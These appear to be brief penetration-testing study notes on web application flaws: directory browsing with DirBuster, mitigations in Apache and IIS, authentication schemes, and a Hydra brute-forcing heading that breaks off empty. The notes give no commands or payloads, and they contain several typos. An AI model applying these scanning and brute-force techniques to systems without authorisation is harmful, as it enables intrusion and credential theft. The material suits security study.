Major Flaws in Web Applicaitons
- Client-side flaws are targeted flaws and exploit the client-side technologies such as AJAX JSON,and flash code to extract information from the client.
Directory browsing
- DirBuster(come as an add-on to the WebScarab proxy,but can still find standlone application).Look out for backup files and renamed files by including the .bak and .old extension in the scan.
- Comments in HTML code(use with Webscarab)
- Mitigation:Directory browsing is a per-directory setting and it needs to be verified on each directory.In Apache ,you can use .htaccess file to override the individual directory setting and in IIS web server ,the directory permission can ben set by using the IIS manager or the
appcmd
command. Authentication protocols and flaws:
- Basic authentication(using the Basse64 encoding which is very easy to reverse and acquire the clear text)
- Digest authentication(It introduced a nonce value that is used as a salt when the client shares the authentication credentials with the server.In addition to the nonce value,the MD5 hash of the password is sent instead of the Base64 encoded value.)
- Intergrated authentication(When a user access a website that leverages intergrated authentication and is part of the same domain as the user,the client passes the token and the user is granted access to the application.LANMAN,NTLMv1,and NTLMv2 are the underlying challenge/response protocols used for the authentication that is seamless)
- Form-based authentication
Brute forcing credentials:
- Hydra: